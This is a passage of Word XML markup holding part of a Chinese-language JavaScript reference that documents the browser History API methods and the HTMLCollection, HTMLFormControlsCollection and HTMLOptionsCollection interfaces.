        <w:lastRenderedPageBreak/>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指明浏览器历史列表中的条目数目。由于无法知道当前显示的文档在这个列表中的索引，因此知道这个列表的大小没什么特别的用途。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void back()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>back()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将让当前</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象所属的窗口或框架页面重新访问在当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>之前刚访问过的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>（如果存在的话）。调用这个方法效果等同于单击浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮。也等同于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>history.go(-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:t>forward()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>forward()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将让当前</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象所属的窗口或框架页面重新访问在当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>之后紧接着访问过的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>（如果存在的话）。调用这个方法效果等同于单击浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮。也等同于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>history.go(1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void go([long delta])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>History.go()</w:t>
      </w:r>
      <w:r>
        <w:t>方法需要一个整数参数，将引发浏览器访问由</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象维护的浏览器历史中的距当前位置指定数目位置的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。如果参数为正数，则浏览器沿着列表向前移动；如果为负数则向后移动。也就是说，调用</w:t>
      </w:r>
      <w:r>
        <w:t>history.go(-1)</w:t>
      </w:r>
      <w:r>
        <w:t>等同于调用</w:t>
      </w:r>
      <w:r>
        <w:t>history.back()</w:t>
      </w:r>
      <w:r>
        <w:t>，也与单击</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮效果一样。如果参数为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或者没有参数，这个方法将重新加载当前显示的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void pushState(any data,string title,[string url])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法添加一个新的条目到窗口的浏览历</w:t>
      </w:r>
      <w:r>
        <w:t>史中，保存一个由</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>以及指定的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>组成的结构化副本（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果用户迟些使用浏览器的历史导航机制回到这个保存的状态，一个</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件将在当前窗口上触发，对应的</w:t>
      </w:r>
      <w:r>
        <w:t>PopStateEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象将在它的</w:t>
      </w:r>
      <w:r>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:t>属性中维护</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>的另一个副本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>提供当前状态的名字，浏览器可能会在它的历史</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>中显示这个名字。（在写作本书的时候，浏览器忽略这个参数）。如果指定参数</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>，它将显示在地址栏中，并且当前状态将可永久保存并可保存为书签或与他人分享。</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>是相</w:t>
      </w:r>
      <w:r>
        <w:t>对于当前文档的地址</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>解析。如果</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>是一个绝对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，它必须与当前文档同源。使用</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的一个通用方法是只使用以</w:t>
      </w:r>
      <w:r>
        <w:t>“#”</w:t>
      </w:r>
      <w:r>
        <w:t>开头的片段标识符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void replaceState(any data,string title,[string url])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法类似于</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>，不同之外是它不是在窗口的浏览历史中创建一个新的条目，而是将当前条目用新的状态</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>更新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="835" w:name="HTMLCollection"/>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="835"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可用键名或数字访问的元素集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>是一个由</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成</w:t>
      </w:r>
      <w:r>
        <w:t>的只读的类数组对象，它也定义了与集合的元素的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>值对应的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了如</w:t>
      </w:r>
      <w:r>
        <w:t>forms</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>item()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>namedItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用于根据位置或名字检索元素，不过几乎没有使用它们的必要：可以简单地将</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>当做</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象处理并访问它的属性及数组元素。比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.images[0]//HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>中一个编号的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.fo</w:t>
      </w:r>
      <w:r>
        <w:t>rms.address//HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>中一个命名的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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当前集合中的元素数目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element item(unsigned long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回集合中索引为</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，如果</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>出界了则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以简单地用在数组方括号中指定位置的方式来代替显式地调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object namedItem(string name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从集合中返回第一个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为参数</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，如果不存在对应元素则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以通过在数组方括号中指定元素名的方式来代替显式地调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="836" w:name="HTMLDocument"/>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:bookmarkEnd w:id="836"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="837" w:name="HTMLElement"/>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="837"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="838" w:name="HTMLFormControlsCollection"/>
      <w:r>
        <w:t>HTMLFormControlsCollection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="838"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表单控件的一个类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTMLFormControlsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>是一种特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>，用于</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素表示表单控件的集合。类似于</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>，可以像数组一样使用数字作为它的索引，也可以将它看做一个对象并通过表单控件的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>进行检索。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单经常包含多个</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性值相同的控件（通常是单选按钮或复选框），</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLFormControlsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>处理它们的方式与普通的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLFormControlsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:r>
        <w:t>时，如果表单包含多个同名的元素，</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLFormControlsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个包含共享这个名字的所有表单控件组成的类数组对象。另外，返回的类数组对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性，值为第一个选中的叫这个名字的单选按钮的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。甚至还可以通过设置这个</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性来选中对应</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>的单选按钮。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="839" w:name="HTMLOptionsCollection"/>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="839"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素的集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HTMLCollection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>是一种特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>，表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素。它重写了</w:t>
      </w:r>
      <w:r>
        <w:t>namedItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以便处理同名的多个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素，它也定义了添加和删除元素的方法。由于历史原因，</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个可写的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可通过设置这个属性来截短或扩展对应的集合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性返回集合中的元素的数目。然而，与常规</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性不同的是，它不是只读的。如果将它设置为一个比当前值小的数字，</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素的集合将被截短，不在集合中的元素将从</w:t>
      </w:r>
      <w:r>
        <w:t>包含的</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中移除。如果将</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>设置为一个比当前值大的数字，空＜</w:t>
      </w:r>
      <w:r>
        <w:t>option/</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素将被创建并添加到</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素以及对应的集合中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long selectedIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>集合中第一个被选中的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>的索引，如果没有</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>被选中则为</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。可以通过设置这个属性来改变选中的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void add(Element option,[any before])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>（必须是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞或者＜</w:t>
      </w:r>
      <w:r>
        <w:t>optgroup</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素）插入到当前集合（以及当前</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素）中</w:t>
      </w:r>
      <w:r>
        <w:t>befo</w:t>
      </w:r>
      <w:r>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>指定的位置处。如果</w:t>
      </w:r>
      <w:r>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，将插入到尾部。如果</w:t>
      </w:r>
      <w:r>
        <w:t>before</w:t>
      </w:r>
